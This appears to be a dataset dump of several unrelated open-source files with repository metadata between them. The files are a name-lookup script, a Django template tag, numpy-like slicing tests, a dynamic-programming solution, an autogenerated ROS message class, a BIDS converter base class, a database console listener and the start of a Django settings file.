a = self.index[feat] = set()
a.add(uid)
return
def lookup(self, name):
# name -> {feats} -> uid
feats = set(expand(name))
uids = None
for f in feats:
if f not in self.index: continue
a = self.index[f]
if uids is None:
uids = a
else:
uids = uids.intersection(a)
return uids
def main(argv):
import getopt
def usage():
print('usage: %s [-i input] [-p HH:MM[-HH:MM]] [file ...]' % argv[0])
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'i:p:')
except getopt.GetoptError:
return usage()
db = IndexDB()
r0 = r1 = None
for (k, v) in opts:
if k == '-i':
path = v
if path.endswith('.csv'):
with open(path, encoding='cp932') as fp:
table = list(csv.reader(fp))
for row in table[1:]:
uid = row[2]
db.addraw(row[2], uid)
db.add(row[3], uid)
db.add(row[4], uid)
else:
with open(path) as fp:
for line in fp:
(line,_,_) = line.strip().partition('#')
if not line: continue
f = line.split()
uid = f.pop(0)
for w in f:
db.add(w, uid)
elif k == '-p':
(t1,_,t2) = v.partition('-')
(h,_,m) = t1.partition(':')
r1 = r0 = time(int(h), int(m))
if t2:
(h,_,m) = t2.partition(':')
r1 = time(int(h), int(m))
assert r0 <= r1
for path in args:
with open(path) as fp:
table = list(csv.reader(fp))
for row in table[1:]:
name = row[0]
dt0 = datetime.strptime(row[2], '%Y/%m/%d %H:%M:%S')
dt1 = datetime.strptime(row[3], '%Y/%m/%d %H:%M:%S')
t0 = dt0.time()
t1 = dt1.time()
if r0 is not None and (t1 < r0 or r1 < t0): continue
uids = db.lookup(name)
if uids is None:
print(f'# notfound: {name}')
elif 2 < len(uids):
print(f'# ambiguous: {name} {uids}')
else:
uid = list(uids)[0]
print(f'{uid} # {name}')
return 0
if __name__ == '__main__': sys.exit(main(sys.argv))
| [
"[email protected]"
] | |
49ada0f710f8c4cfc75d72062f98d7d676d520c4 | f8e71f84205a81d11d4fda4c53c2db9b3fa0dd65 | /chloroform/templatetags/chloroform.py | 95be5897475b86ac48c76cfe10f7beb600cdde71 | [] | no_license | cecedille1/chloroform | 789dbf0e283ae8bc561de63317b0c21a6ff01fe9 | 68a68cb3d094e69987135668abd2ebcb80b993b1 | refs/heads/master | 2021-06-03T00:45:30.426587 | 2018-04-23T10:17:10 | 2018-04-23T10:17:10 | 254,330,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 949 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from django import template
from chloroform.forms import ContactFormBuilder
from chloroform.models import Configuration
from chloroform.helpers import ChloroformTagHelper, FormHelperGetterMixin
register = template.Library()
class ChloroformHelperGetter(FormHelperGetterMixin):
form_helper_class = ChloroformTagHelper
@register.inclusion_tag('chloroform/tag.html')
def chloroform(name=None):
if isinstance(name, Configuration):
conf = name
elif name is None:
conf = Configuration.objects.get_default()
else:
conf = Configuration.objects.get(name=name)
helper_getter = ChloroformHelperGetter()
form_builder = ContactFormBuilder(conf)
form_class = form_builder.get_form()
form = form_class()
return {
'form_helper': helper_getter.get_form_helper(form),
'configuration': conf,
'form': form,
}
| [
"[email protected]"
] | |
30e78d2b6cb33880f8469deab8d18521ad8705d3 | ef76f8bcea6cc5331b4c8873704426f1aacfd60d | /tests/test_likenumpy.py | 33b1e97bd9a7e2c4fce6a68e09a09b1832715d35 | [
"BSD-3-Clause"
] | permissive | DumbMachine/awkward-array | 10a51c8ac471839e435bb471f45b6624c4f982cb | 8f54cc5d4de3bc56628676243bfe63c683667f16 | refs/heads/master | 2020-04-15T17:43:42.684480 | 2019-01-18T18:39:46 | 2019-01-18T18:39:46 | 164,884,686 | 1 | 0 | BSD-3-Clause | 2019-01-18T18:33:23 | 2019-01-09T15:06:24 | Python | UTF-8 | Python | false | false | 6,027 | py | #!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import numpy
import awkward
class Test(unittest.TestCase):
def runTest(self):
pass
def test_likenumpy_slices(self):
print()
np = numpy.array([[1, 10, 100], [2, 20, 200], [3, 30, 300]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
np = numpy.array([[[1, 10, 100], [2, 20, 200], [3, 30, 300]], [[4, 40, 400], [5, 50, 500], [6, 60, 600]], [[7, 70, 700], [8, 80, 800], [9, 90, 900]]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
assert np[:2, :2, 0].tolist() == aw[:2, :2, 0].tolist()
assert np[:2, 2, 0].tolist() == aw[:2, 2, 0].tolist()
assert np[2, :2, 0].tolist() == aw[2, :2, 0].tolist()
assert np[:2, [0, 1], 0].tolist() == aw[:2, [0, 1], 0].tolist()
assert np[[0, 1], :2, 0].tolist() == aw[[0, 1], :2, 0].tolist()
assert np[:2, [0, 1, 2], 0].tolist() == aw[:2, [0, 1, 2], 0].tolist()
assert np[[0, 1, 2], :2, 0].tolist() == aw[[0, 1, 2], :2, 0].tolist()
assert np[[0, 1], [0, 1], 0].tolist() == aw[[0, 1], [0, 1], 0].tolist()
assert np[[0, 1, 2], [0, 1, 2], 0].tolist() == aw[[0, 1, 2], [0, 1, 2], 0].tolist()
assert np[:2, [True, False, True], 0].tolist() == aw[:2, [True, False, True], 0].tolist()
assert np[[True, False, True], :2, 0].tolist() == aw[[True, False, True], :2, 0].tolist()
assert np[[True, False, True], [True, False, True], 0].tolist() == aw[[True, False, True], [True, False, True], 0].tolist()
assert np[:2, :2, 1].tolist() == aw[:2, :2, 1].tolist()
assert np[:2, 2, 1].tolist() == aw[:2, 2, 1].tolist()
assert np[2, :2, 1].tolist() == aw[2, :2, 1].tolist()
assert np[:2, [0, 1], 1].tolist() == aw[:2, [0, 1], 1].tolist()
assert np[[0, 1], :2, 1].tolist() == aw[[0, 1], :2, 1].tolist()
assert np[:2, [0, 1, 2], 1].tolist() == aw[:2, [0, 1, 2], 1].tolist()
assert np[[0, 1, 2], :2, 1].tolist() == aw[[0, 1, 2], :2, 1].tolist()
assert np[[0, 1], [0, 1], 1].tolist() == aw[[0, 1], [0, 1], 1].tolist()
assert np[[0, 1, 2], [0, 1, 2], 1].tolist() == aw[[0, 1, 2], [0, 1, 2], 1].tolist()
assert np[:2, [True, False, True], 1].tolist() == aw[:2, [True, False, True], 1].tolist()
assert np[[True, False, True], :2, 1].tolist() == aw[[True, False, True], :2, 1].tolist()
assert np[[True, False, True], [True, False, True], 1].tolist() == aw[[True, False, True], [True, False, True], 1].tolist()
| [
"[email protected]"
] | |
0430c8e68c0e36d441ff3a4c2768d2abb1a26a4f | 7847756062b6952fd881e3f0896c1dc600a0ba66 | /Arrays and Strings/MaximumSumIncreasingSubsequence.py | 74ae17c3980ecfff8c398cb3f0baa89e62e521b9 | [
"MIT"
] | permissive | renowncoder/hello-interview | be22214f02631a9e17643af054cfbe3411c8da1a | 78f6cf4e2da4106fd07f4bd86247026396075c69 | refs/heads/master | 2021-01-03T11:36:30.862323 | 2019-06-01T02:58:22 | 2019-06-01T02:58:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | """
Maximum Sum Increasing Subsequence
https://practice.geeksforgeeks.org/problems/maximum-sum-increasing-subsequence/0/?ref=self
"""
def maximum_sum_increasing_subsequence(numbers, size):
"""
Given an array of n positive integers. Write a program to find the sum of
maximum sum subsequence of the given array such that the integers in the
subsequence are sorted in increasing order.
"""
results = [numbers[i] for i in range(size)]
for i in range(1, size):
for j in range(i):
if numbers[i] > numbers[j] and results[i] < results[j] + numbers[i]:
results[i] = results[j] + numbers[i]
return max(results)
def main():
"""
driver function
"""
test_cases = int(input())
while test_cases > 0:
size = int(input())
numbers = list(map(int, input().strip().split(" ")))
print(maximum_sum_increasing_subsequence(numbers, size))
test_cases -= 1
main() | [
"[email protected]"
] | |
2504e3d14d7c689b9a20d6c18fc8b18a0c2c892e | 75a3749bbcede8e9ba432ec4422e3e55ff01852d | /devel/lib/python2.7/dist-packages/kautham/srv/_ReqPlan.py | 206e039157b1e2ac8103f985802156b6668c25a8 | [] | no_license | fersolerv/Ros_Regrasp | 749508dc992dda35b36b6f8952c7e40b2ae18bf0 | 8f6b3ac0ec16bff13890abc60a1c5acc6289c9ea | refs/heads/master | 2020-03-22T03:18:15.049574 | 2019-08-29T12:58:41 | 2019-08-29T12:58:41 | 139,424,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,355 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from kautham/ReqPlanRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class ReqPlanRequest(genpy.Message):
_md5sum = "fb05da14d2435383dc6c819a190caa0e"
_type = "kautham/ReqPlanRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """std_msgs/String problem
================================================================================
MSG: std_msgs/String
string data
"""
__slots__ = ['problem']
_slot_types = ['std_msgs/String']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
problem
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ReqPlanRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.problem is None:
self.problem = std_msgs.msg.String()
else:
self.problem = std_msgs.msg.String()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.problem.data
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.problem is None:
self.problem = std_msgs.msg.String()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.problem.data = str[start:end].decode('utf-8')
else:
self.problem.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.problem.data
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.problem is None:
self.problem = std_msgs.msg.String()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.problem.data = str[start:end].decode('utf-8')
else:
self.problem.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from kautham/ReqPlanResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import trajectory_msgs.msg
import genpy
import std_msgs.msg
class ReqPlanResponse(genpy.Message):
_md5sum = "1406506fbfd269e79e1a93b4e8386da6"
_type = "kautham/ReqPlanResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """trajectory_msgs/JointTrajectory plan
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
"""
__slots__ = ['plan']
_slot_types = ['trajectory_msgs/JointTrajectory']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
plan
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ReqPlanResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
else:
self.plan = trajectory_msgs.msg.JointTrajectory()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs))
_x = self.plan.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.plan.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.plan.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.plan.points)
buff.write(_struct_I.pack(length))
for val1 in self.plan.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.positions))
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.velocities))
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.accelerations))
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.effort))
_v1 = val1.time_from_start
_x = _v1
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.plan.header.frame_id = str[start:end].decode('utf-8')
else:
self.plan.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.plan.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = struct.unpack(pattern, str[start:end])
_v2 = val1.time_from_start
_x = _v2
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.plan.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs))
_x = self.plan.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.plan.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.plan.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.plan.points)
buff.write(_struct_I.pack(length))
for val1 in self.plan.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.positions.tostring())
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.velocities.tostring())
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.accelerations.tostring())
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.effort.tostring())
_v3 = val1.time_from_start
_x = _v3
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.plan.header.frame_id = str[start:end].decode('utf-8')
else:
self.plan.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.plan.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v4 = val1.time_from_start
_x = _v4
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.plan.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
class ReqPlan(object):
_type = 'kautham/ReqPlan'
_md5sum = 'c28c6945c8dac4a6baf20710ae93dd37'
_request_class = ReqPlanRequest
_response_class = ReqPlanResponse
| [
"[email protected]"
] | |
7d7826a4d5a3e34518f0869319124c892f24f540 | f47fb0266f9f90bff0b6701f6cb46083f565e028 | /ando/tools/generator/bidsconverter.py | 6f5b2a8ef61356ea80674b86dcf73fcdbd12ff6b | [
"MIT"
] | permissive | Slowblitz/AnDO | d8dc452a9ea0b34e0b96ec8f1e542652ee1be6ce | c6c6477f41342fb31de57da097ee066c96e9130c | refs/heads/master | 2023-05-28T00:57:23.249749 | 2021-05-18T07:17:54 | 2021-05-18T07:17:54 | 330,702,652 | 0 | 0 | MIT | 2021-01-18T15:07:00 | 2021-01-18T15:06:59 | null | UTF-8 | Python | false | false | 2,951 | py | from abc import ABC, abstractmethod
from collections import defaultdict
from pathlib import Path
class BidsConverter(ABC):
def __init__(self, dataset_path, **kwargs):
self.dataset_path = Path(dataset_path)
self._kwargs = kwargs
self._participants_dict = dict(name=Path('participants.tsv'),
data=None)
self._dataset_desc_json = dict(name=Path('dataset_description.json'),
data=None)
self._sessions_dict = defaultdict(dict)
self._channels_dict = defaultdict(dict)
self._contacts_dict = defaultdict(dict)
self._ephys_dict = defaultdict(dict)
self._probes_dict = defaultdict(dict)
self._nwbfile_name_dict = defaultdict(dict)
self.datafiles_list = []
@abstractmethod
def _extract_metadata(self):
pass
@abstractmethod
def organize(self):
pass
def get_subject_names(self):
return list(self._participants_dict['data']['ParticipantID'])
def get_session_names(self, subject_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
return list(self._sessions_dict[subject_name]['data']['session_id'])
def get_channels_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._channels_dict[subject_name][session_name]['data'].to_dict()
def get_contacts_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._contacts_dict[subject_name][session_name]['data'].to_dict()
def get_ephys_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._ephys_dict[subject_name][session_name]['data']
def get_probes_info(self, subject_name=None, session_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
if session_name is None:
session_name = self.get_session_names()[0]
return self._probes_dict[subject_name][session_name]['data'].to_dict()
def get_participants_info(self):
return self._participants_dict['data'].to_dict()
def get_dataset_description(self):
return self._dataset_desc_json['data']
def get_session_info(self, subject_name=None):
if subject_name is None:
subject_name = self.get_subject_names()[0]
return self._sessions_dict[subject_name]['data'].to_dict()
| [
"[email protected]"
] | |
4fe98793df58d5e1bf85fc96af28a813a0e52817 | 906e8d5711f64b45db1541ea15ab5de50c73fafa | /src/api/listeners/console.py | 9ab2fd7769322fa1b97d3a3048b9ab91dc515ed7 | [
"MIT"
] | permissive | yagrxu/infrabox | 079cb2f04f13dc31811698fe94354e32e8ea91e1 | 1d8789db1968897fd471d4dbc1480395d365ff85 | refs/heads/master | 2021-04-15T10:31:54.697521 | 2018-03-21T21:48:12 | 2018-03-21T21:48:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import json
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
from eventlet.hubs import trampoline
from pyinfraboxutils.db import connect_db
from pyinfraboxutils import dbpool
from pyinfraboxutils import get_logger
logger = get_logger('console_listener')
def __handle_event(event, socketio, client_manager):
job_id = event['job_id']
console_id = event['id']
if not client_manager.has_clients(job_id):
return
logger.info('start console %s', console_id)
conn = dbpool.get()
try:
r = conn.execute_one('''
SELECT output FROM console WHERE id = %s
''', [console_id])
logger.info('retrived console %s', console_id)
if not r:
return
r = r[0]
socketio.emit('notify:console', {
'data': r,
'job_id': job_id
}, room=job_id)
finally:
dbpool.put(conn)
logger.info('stop console %s', console_id)
def listen(socketio, client_manager):
while True:
try:
__listen(socketio, client_manager)
except Exception as e:
logger.exception(e)
def __listen(socketio, client_manager):
conn = connect_db()
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
cur = conn.cursor()
cur.execute("LISTEN console_update")
while True:
trampoline(conn, read=True)
conn.poll()
while conn.notifies:
n = conn.notifies.pop()
socketio.start_background_task(__handle_event,
json.loads(n.payload),
socketio,
client_manager)
| [
"[email protected]"
] | |
9e59cfabe06d7aee1aed1b645a3af1b9c7cbd09a | 825f89203b1f1b1c5e05bab87b764cfd78c9e64d | /mysite/mysite/settings.py | 4854e96520e9fd88ceb8cc9debbd79b45583ce1b | [] | no_license | jaredharley/learn-python | d3086967c1f67a0baa48071e3c7a359da88ebfbd | d54926714ac399e317d723cb237328bfdf0dbec2 | refs/heads/master | 2016-09-05T13:28:37.685244 | 2016-01-06T05:00:04 | 2016-01-06T05:00:04 | 28,735,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | """
Django settings for mysite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
